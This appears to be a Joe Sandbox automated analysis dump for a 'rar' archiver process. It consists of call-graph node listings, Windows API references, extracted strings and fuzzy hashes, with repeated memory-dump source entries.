39718->39721 39722 7ff7139b4434 34 API calls _onexit 39719->39722 39721->39684 39722->39721 39724 7ff7139b3b45 GetModuleFileNameA 39723->39724 39725 7ff7139b937d 39723->39725 39724->39692 39733 7ff7139b91b0 48 API calls 6 library calls 39725->39733 39727->39691 39728->39694 39729->39696 39730->39698 39731->39711 39732->39704 39733->39724 39734->39555 39736 7ff71399b496 GetProcAddress 39735->39736 39737 7ff713987e45 39735->39737 39738 7ff71399b4cb GetProcAddress 39736->39738 39739 7ff71399b4ae 39736->39739 39740 7ff713967a68 39737->39740 39738->39737 39739->39738 39741 7ff713967a76 39740->39741 39761 7ff7139b2ae4 39741->39761 39743 7ff713967a80 39744 7ff7139b2ae4 setbuf 60 API calls 39743->39744 39745 7ff713967a94 39744->39745 39770 7ff713967b44 GetStdHandle GetFileType 39745->39770 39748 7ff713967b44 3 API calls 39749 7ff713967aae 39748->39749 39750 7ff713967b44 3 API calls 39749->39750 39752 7ff713967abe 39750->39752 39751 7ff713967b12 39760 7ff71396cd78 SetConsoleCtrlHandler 39751->39760 39754 7ff713967aeb 39752->39754 39773 7ff7139b2abc 31 API calls 2 library calls 39752->39773 39754->39751 39775 7ff7139b2abc 31 API calls 2 library calls 39754->39775 39755 7ff713967adf 39774 7ff7139b2b40 33 API calls 3 library calls 39755->39774 39758 7ff713967b06 39776 7ff7139b2b40 33 API calls 3 library calls 39758->39776 39762 7ff7139b2ae9 39761->39762 39763 7ff7139b7ee8 39762->39763 39765 7ff7139b7f23 39762->39765 39777 7ff7139b4f3c 15 API calls memcpy_s 39763->39777 39779 7ff7139b7d98 60 API calls 2 library calls 39765->39779 39766 7ff7139b7eed 39778 7ff7139b4e1c 31 API calls _invalid_parameter_noinfo 39766->39778 39769 7ff7139b7ef8 39769->39743 39771 7ff713967a9e 39770->39771 39772 7ff713967b61 GetConsoleMode 39770->39772 39771->39748 39772->39771 39773->39755 39774->39754 39775->39758 39776->39751 39777->39766 39778->39769 39779->39769 39780 7ff7139b231c 39781 7ff7139b2342 GetModuleHandleW 39780->39781 39782 7ff7139b238c 39780->39782 39781->39782 39785 7ff7139b234f 39781->39785 39793 7ff7139b6938 EnterCriticalSection 39782->39793 39784 7ff7139b6998 abort LeaveCriticalSection 39786 7ff7139b2460 39784->39786 39785->39782 39794 7ff7139b24d4 GetModuleHandleExW 39785->39794 39788 7ff7139b246c 39786->39788 39789 7ff7139b2488 11 API calls 39786->39789 39787 7ff7139b2396 39790 7ff7139b43b8 16 API calls 39787->39790 39792 7ff7139b2410 39787->39792 39789->39788 39790->39792 39792->39784 39795 7ff7139b2525 39794->39795 39796 7ff7139b24fe GetProcAddress 39794->39796 39798 7ff7139b252f FreeLibrary 39795->39798 39799 7ff7139b2535 39795->39799 39796->39795 39797 7ff7139b2518 39796->39797 39797->39795 39798->39799 39799->39782
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000058.00000002.2319158388.00007FF713951000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF713950000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319133618.00007FF713950000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319218457.00007FF7139C0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319251920.00007FF7139D8000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319277999.00007FF7139D9000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139DA000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139E4000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139EE000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139F6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319416411.00007FF7139F8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319448367.00007FF7139FE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_88_2_7ff713950000_rar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: *.%ls$*?.$+$7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tgz;xz;z;zip;zipx$EML$ERR$LOG$NUL$OFF$SFX$SND$VER$default.sfx$rar.log$stdin$stdin
                                                                                                                                                                                                                                          • API String ID: 0-1628410872
                                                                                                                                                                                                                                          • Opcode ID: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
                                                                                                                                                                                                                                          • Instruction ID: a9af07292c955b746de2f046eb00180c83a22425f97619f95119b9f24dc9d007
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 76C2B5B2A0E98381FAE4BF2485441BDA691AF417BCFD94135C90E672C5DE6DE94CC3B0
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000058.00000002.2319158388.00007FF713951000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF713950000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319133618.00007FF713950000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319218457.00007FF7139C0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319251920.00007FF7139D8000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319277999.00007FF7139D9000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139DA000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139E4000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139EE000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139F6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319416411.00007FF7139F8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319448367.00007FF7139FE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_88_2_7ff713950000_rar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: %s%s $.ext$exe$rar$sfx$,6$BK$q:
                                                                                                                                                                                                                                          • API String ID: 0-1660254149
                                                                                                                                                                                                                                          • Opcode ID: 0c0b921d0b311a97555fb44d5d4ee5c10b30d4247630290dee678d4f4fbba25b
                                                                                                                                                                                                                                          • Instruction ID: c7dfe826d7f69ef241f4f806cfa7a4e59588eb5d86481f8dde5c8db2a5be38eb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c0b921d0b311a97555fb44d5d4ee5c10b30d4247630290dee678d4f4fbba25b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67E2BE66A09EC285EBA0EF25D8401EDA7B1FB457ACF850037DA4D27796DF39D588C320

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF713994AE0: FreeLibrary.KERNEL32(?,?,00000000,00007FF71396CC90), ref: 00007FF713994AF5
                                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,?,00007FF713987E7D), ref: 00007FF71399492E
                                                                                                                                                                                                                                          • GetVersionExW.KERNEL32(?,?,?,00007FF713987E7D), ref: 00007FF71399496A
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNELBASE(?,?,?,00007FF713987E7D), ref: 00007FF713994993
                                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(?,?,?,00007FF713987E7D), ref: 00007FF71399499F
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000058.00000002.2319158388.00007FF713951000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF713950000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319133618.00007FF713950000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319218457.00007FF7139C0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319251920.00007FF7139D8000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319277999.00007FF7139D9000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139DA000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139E4000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139EE000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139F6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319416411.00007FF7139F8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319448367.00007FF7139FE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_88_2_7ff713950000_rar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Library$Load$FileFreeModuleNameVersion
                                                                                                                                                                                                                                          • String ID: rarlng.dll
                                                                                                                                                                                                                                          • API String ID: 2520153904-1675521814
                                                                                                                                                                                                                                          • Opcode ID: 49b096ca26b206715f71fd28137422a8c8958387befaadcb30f15fb4690b8ba1
                                                                                                                                                                                                                                          • Instruction ID: 9b2569998decb65ae342702c0b3553daf8e332e242ded51ad6efaab3388051d3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 49b096ca26b206715f71fd28137422a8c8958387befaadcb30f15fb4690b8ba1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03319431A18E4285FBA4EB25E8402E9A368FB45BACFC04135E94D63794DF3DD94DCB10

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RegOpenKeyExW.KERNELBASE(?,?,?,?,00000800,00000000,00000000,00007FF7139838CB,?,?,?,00007FF7139841EC), ref: 00007FF7139843D1
                                                                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF7139838CB,?,?,?,00007FF7139841EC), ref: 00007FF713984402
                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF7139838CB,?,?,?,00007FF7139841EC), ref: 00007FF71398440D
                                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,?,?,00000800,00000000,00000000,00007FF7139838CB,?,?,?,00007FF7139841EC), ref: 00007FF71398443E
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000058.00000002.2319158388.00007FF713951000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF713950000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319133618.00007FF713950000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319218457.00007FF7139C0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319251920.00007FF7139D8000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319277999.00007FF7139D9000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139DA000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139E4000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139EE000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139F6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319416411.00007FF7139F8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319448367.00007FF7139FE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_88_2_7ff713950000_rar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseFileModuleNameOpenQueryValue
                                                                                                                                                                                                                                          • String ID: AppData$Software\WinRAR\Paths
                                                                                                                                                                                                                                          • API String ID: 3617018055-3415417297
                                                                                                                                                                                                                                          • Opcode ID: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
                                                                                                                                                                                                                                          • Instruction ID: 4feeafe9dde629701b8e34eb0856fe7c1f66a59cba460077fbcf5ca236e181d1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B117562628F4585EB90AF26E4015A9F360FF85BE8F845135EA4E27755DF3CD008CB50
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000058.00000002.2319158388.00007FF713951000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF713950000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319133618.00007FF713950000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319218457.00007FF7139C0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319251920.00007FF7139D8000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319277999.00007FF7139D9000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139DA000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139E4000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139EE000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139F6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319416411.00007FF7139F8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319448367.00007FF7139FE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_88_2_7ff713950000_rar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                                                                          • Opcode ID: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
                                                                                                                                                                                                                                          • Instruction ID: 33e2108091c723e3e168f3bc1b955fed7a4b2792b3ff89472748a1f949063fac
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08E04F20B18F0542EAC4BB3098817796363AF85769F405478CC4E23397CE3DE80C8770
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000058.00000002.2319158388.00007FF713951000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF713950000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319133618.00007FF713950000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319218457.00007FF7139C0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319251920.00007FF7139D8000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319277999.00007FF7139D9000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139DA000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139E4000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139EE000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139F6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319416411.00007FF7139F8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319448367.00007FF7139FE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_88_2_7ff713950000_rar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 932687459-0
                                                                                                                                                                                                                                          • Opcode ID: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
                                                                                                                                                                                                                                          • Instruction ID: d06481189cfeebca4fa0ddfeffa3878d8197837d5a61ff9d61fecb8f28eb26ac
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC218453908F8582EB419F29E5510B86370FB98BA8B54A322DF9D53656EF38E5E98300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000058.00000002.2319158388.00007FF713951000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF713950000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319133618.00007FF713950000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319218457.00007FF7139C0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319251920.00007FF7139D8000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319277999.00007FF7139D9000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139DA000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139E4000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139EE000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139F6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319416411.00007FF7139F8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319448367.00007FF7139FE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_88_2_7ff713950000_rar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 2a1261cd3339fabc38624afcbcdbd896567f3adcd0b5f50981079364417382e6
                                                                                                                                                                                                                                          • Instruction ID: f1f7f0f93a00efdeefc3801954c5845ac86dc054621166f1964abae62591acd7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a1261cd3339fabc38624afcbcdbd896567f3adcd0b5f50981079364417382e6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC118131509F8182EA84BB55A5013ADF2E4EF85BA8FA40634E6AD177E6DE3CD0558320
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000058.00000002.2319158388.00007FF713951000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF713950000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319133618.00007FF713950000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319218457.00007FF7139C0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319251920.00007FF7139D8000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319277999.00007FF7139D9000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139DA000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139E4000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139EE000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139F6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319416411.00007FF7139F8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319448367.00007FF7139FE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_88_2_7ff713950000_rar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2976181284-0
                                                                                                                                                                                                                                          • Opcode ID: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
                                                                                                                                                                                                                                          • Instruction ID: f0c6f1ceac3050d898753a636cb8f21d17a971a456e788d6d03b08feb17efb53
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7016162A28E8291EFA4AF29E445279A361EB447BDF944331E17D111E5CF3CD58ECB20
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000058.00000002.2319158388.00007FF713951000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF713950000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319133618.00007FF713950000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319218457.00007FF7139C0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319251920.00007FF7139D8000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319277999.00007FF7139D9000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139DA000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139E4000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139EE000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139F6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319416411.00007FF7139F8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319448367.00007FF7139FE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_88_2_7ff713950000_rar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DirectoryLibraryLoadSystem
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1175261203-0
                                                                                                                                                                                                                                          • Opcode ID: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
                                                                                                                                                                                                                                          • Instruction ID: 241a79c07aa2fbad9b1956dcf6f7ab4fb5179666c0eb1305311518af69e4976d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31F03C61B28D8186F6F0BB10E8153FAE364BF9C798FC04531E9CD92755DE2CD2488B20
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000058.00000002.2319158388.00007FF713951000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF713950000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319133618.00007FF713950000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319218457.00007FF7139C0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319251920.00007FF7139D8000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319277999.00007FF7139D9000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139DA000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139E4000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139EE000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319306732.00007FF7139F6000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319416411.00007FF7139F8000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000058.00000002.2319448367.00007FF7139FE000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_88_2_7ff713950000_rar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
